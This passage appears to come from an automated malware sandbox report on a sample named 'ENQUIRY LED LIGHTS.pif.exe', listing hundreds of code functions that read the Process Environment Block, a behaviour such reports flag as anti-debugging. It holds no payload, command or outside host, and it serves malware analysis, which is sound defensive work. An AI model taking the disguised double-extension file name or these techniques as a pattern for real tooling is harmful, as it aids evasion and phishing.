            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F90283 mov eax, dword ptr fs:[00000030h]3_2_02F90283
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14260 mov eax, dword ptr fs:[00000030h]3_2_02F14260
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14260 mov eax, dword ptr fs:[00000030h]3_2_02F14260
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14260 mov eax, dword ptr fs:[00000030h]3_2_02F14260
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0826B mov eax, dword ptr fs:[00000030h]3_2_02F0826B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A250 mov eax, dword ptr fs:[00000030h]3_2_02F0A250
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16259 mov eax, dword ptr fs:[00000030h]3_2_02F16259
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCA250 mov eax, dword ptr fs:[00000030h]3_2_02FCA250
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCA250 mov eax, dword ptr fs:[00000030h]3_2_02FCA250
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F98243 mov eax, dword ptr fs:[00000030h]3_2_02F98243
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F98243 mov ecx, dword ptr fs:[00000030h]3_2_02F98243
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0823B mov eax, dword ptr fs:[00000030h]3_2_02F0823B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E3F0 mov eax, dword ptr fs:[00000030h]3_2_02F2E3F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E3F0 mov eax, dword ptr fs:[00000030h]3_2_02F2E3F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E3F0 mov eax, dword ptr fs:[00000030h]3_2_02F2E3F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F463FF mov eax, dword ptr fs:[00000030h]3_2_02F463FF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE3DB mov eax, dword ptr fs:[00000030h]3_2_02FBE3DB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE3DB mov eax, dword ptr fs:[00000030h]3_2_02FBE3DB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE3DB mov ecx, dword ptr fs:[00000030h]3_2_02FBE3DB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE3DB mov eax, dword ptr fs:[00000030h]3_2_02FBE3DB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB43D4 mov eax, dword ptr fs:[00000030h]3_2_02FB43D4
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB43D4 mov eax, dword ptr fs:[00000030h]3_2_02FB43D4
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCC3CD mov eax, dword ptr fs:[00000030h]3_2_02FCC3CD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F183C0 mov eax, dword ptr fs:[00000030h]3_2_02F183C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F183C0 mov eax, dword ptr fs:[00000030h]3_2_02F183C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F183C0 mov eax, dword ptr fs:[00000030h]3_2_02F183C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F183C0 mov eax, dword ptr fs:[00000030h]3_2_02F183C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F963C0 mov eax, dword ptr fs:[00000030h]3_2_02F963C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F08397 mov eax, dword ptr fs:[00000030h]3_2_02F08397
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F08397 mov eax, dword ptr fs:[00000030h]3_2_02F08397
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F08397 mov eax, dword ptr fs:[00000030h]3_2_02F08397
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E388 mov eax, dword ptr fs:[00000030h]3_2_02F0E388
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E388 mov eax, dword ptr fs:[00000030h]3_2_02F0E388
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E388 mov eax, dword ptr fs:[00000030h]3_2_02F0E388
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3438F mov eax, dword ptr fs:[00000030h]3_2_02F3438F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3438F mov eax, dword ptr fs:[00000030h]3_2_02F3438F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB437C mov eax, dword ptr fs:[00000030h]3_2_02FB437C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov eax, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov eax, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov eax, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov ecx, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov eax, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov eax, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB8350 mov ecx, dword ptr fs:[00000030h]3_2_02FB8350
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDA352 mov eax, dword ptr fs:[00000030h]3_2_02FDA352
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0C310 mov ecx, dword ptr fs:[00000030h]3_2_02F0C310
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F30310 mov ecx, dword ptr fs:[00000030h]3_2_02F30310
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A30B mov eax, dword ptr fs:[00000030h]3_2_02F4A30B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A30B mov eax, dword ptr fs:[00000030h]3_2_02F4A30B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A30B mov eax, dword ptr fs:[00000030h]3_2_02F4A30B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0C0F0 mov eax, dword ptr fs:[00000030h]3_2_02F0C0F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F520F0 mov ecx, dword ptr fs:[00000030h]3_2_02F520F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A0E3 mov ecx, dword ptr fs:[00000030h]3_2_02F0A0E3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F180E9 mov eax, dword ptr fs:[00000030h]3_2_02F180E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F960E0 mov eax, dword ptr fs:[00000030h]3_2_02F960E0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F920DE mov eax, dword ptr fs:[00000030h]3_2_02F920DE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD60B8 mov eax, dword ptr fs:[00000030h]3_2_02FD60B8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD60B8 mov ecx, dword ptr fs:[00000030h]3_2_02FD60B8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA80A8 mov eax, dword ptr fs:[00000030h]3_2_02FA80A8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1208A mov eax, dword ptr fs:[00000030h]3_2_02F1208A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3C073 mov eax, dword ptr fs:[00000030h]3_2_02F3C073
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F12050 mov eax, dword ptr fs:[00000030h]3_2_02F12050
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96050 mov eax, dword ptr fs:[00000030h]3_2_02F96050
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6030 mov eax, dword ptr fs:[00000030h]3_2_02FA6030
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A020 mov eax, dword ptr fs:[00000030h]3_2_02F0A020
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0C020 mov eax, dword ptr fs:[00000030h]3_2_02F0C020
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E016 mov eax, dword ptr fs:[00000030h]3_2_02F2E016
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E016 mov eax, dword ptr fs:[00000030h]3_2_02F2E016
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E016 mov eax, dword ptr fs:[00000030h]3_2_02F2E016
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E016 mov eax, dword ptr fs:[00000030h]3_2_02F2E016
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F94000 mov ecx, dword ptr fs:[00000030h]3_2_02F94000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F401F8 mov eax, dword ptr fs:[00000030h]3_2_02F401F8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE61E5 mov eax, dword ptr fs:[00000030h]3_2_02FE61E5
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F8E1D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F8E1D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E1D0 mov ecx, dword ptr fs:[00000030h]3_2_02F8E1D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F8E1D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F8E1D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD61C3 mov eax, dword ptr fs:[00000030h]3_2_02FD61C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD61C3 mov eax, dword ptr fs:[00000030h]3_2_02FD61C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9019F mov eax, dword ptr fs:[00000030h]3_2_02F9019F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9019F mov eax, dword ptr fs:[00000030h]3_2_02F9019F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9019F mov eax, dword ptr fs:[00000030h]3_2_02F9019F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9019F mov eax, dword ptr fs:[00000030h]3_2_02F9019F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A197 mov eax, dword ptr fs:[00000030h]3_2_02F0A197
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A197 mov eax, dword ptr fs:[00000030h]3_2_02F0A197
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A197 mov eax, dword ptr fs:[00000030h]3_2_02F0A197
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F50185 mov eax, dword ptr fs:[00000030h]3_2_02F50185
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCC188 mov eax, dword ptr fs:[00000030h]3_2_02FCC188
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCC188 mov eax, dword ptr fs:[00000030h]3_2_02FCC188
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB4180 mov eax, dword ptr fs:[00000030h]3_2_02FB4180
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB4180 mov eax, dword ptr fs:[00000030h]3_2_02FB4180
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA8158 mov eax, dword ptr fs:[00000030h]3_2_02FA8158
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16154 mov eax, dword ptr fs:[00000030h]3_2_02F16154
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16154 mov eax, dword ptr fs:[00000030h]3_2_02F16154
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0C156 mov eax, dword ptr fs:[00000030h]3_2_02F0C156
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA4144 mov eax, dword ptr fs:[00000030h]3_2_02FA4144
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA4144 mov eax, dword ptr fs:[00000030h]3_2_02FA4144
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA4144 mov ecx, dword ptr fs:[00000030h]3_2_02FA4144
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA4144 mov eax, dword ptr fs:[00000030h]3_2_02FA4144
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA4144 mov eax, dword ptr fs:[00000030h]3_2_02FA4144
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F40124 mov eax, dword ptr fs:[00000030h]3_2_02F40124
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBA118 mov ecx, dword ptr fs:[00000030h]3_2_02FBA118
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBA118 mov eax, dword ptr fs:[00000030h]3_2_02FBA118
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBA118 mov eax, dword ptr fs:[00000030h]3_2_02FBA118
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBA118 mov eax, dword ptr fs:[00000030h]3_2_02FBA118
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD0115 mov eax, dword ptr fs:[00000030h]3_2_02FD0115
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov ecx, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov ecx, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov ecx, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov ecx, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F906F1 mov eax, dword ptr fs:[00000030h]3_2_02F906F1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F906F1 mov eax, dword ptr fs:[00000030h]3_2_02F906F1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F8E6F2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F8E6F2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F8E6F2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F8E6F2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A6C7 mov ebx, dword ptr fs:[00000030h]3_2_02F4A6C7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A6C7 mov eax, dword ptr fs:[00000030h]3_2_02F4A6C7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F466B0 mov eax, dword ptr fs:[00000030h]3_2_02F466B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C6A6 mov eax, dword ptr fs:[00000030h]3_2_02F4C6A6
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14690 mov eax, dword ptr fs:[00000030h]3_2_02F14690
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14690 mov eax, dword ptr fs:[00000030h]3_2_02F14690
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F42674 mov eax, dword ptr fs:[00000030h]3_2_02F42674
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD866E mov eax, dword ptr fs:[00000030h]3_2_02FD866E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD866E mov eax, dword ptr fs:[00000030h]3_2_02FD866E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A660 mov eax, dword ptr fs:[00000030h]3_2_02F4A660
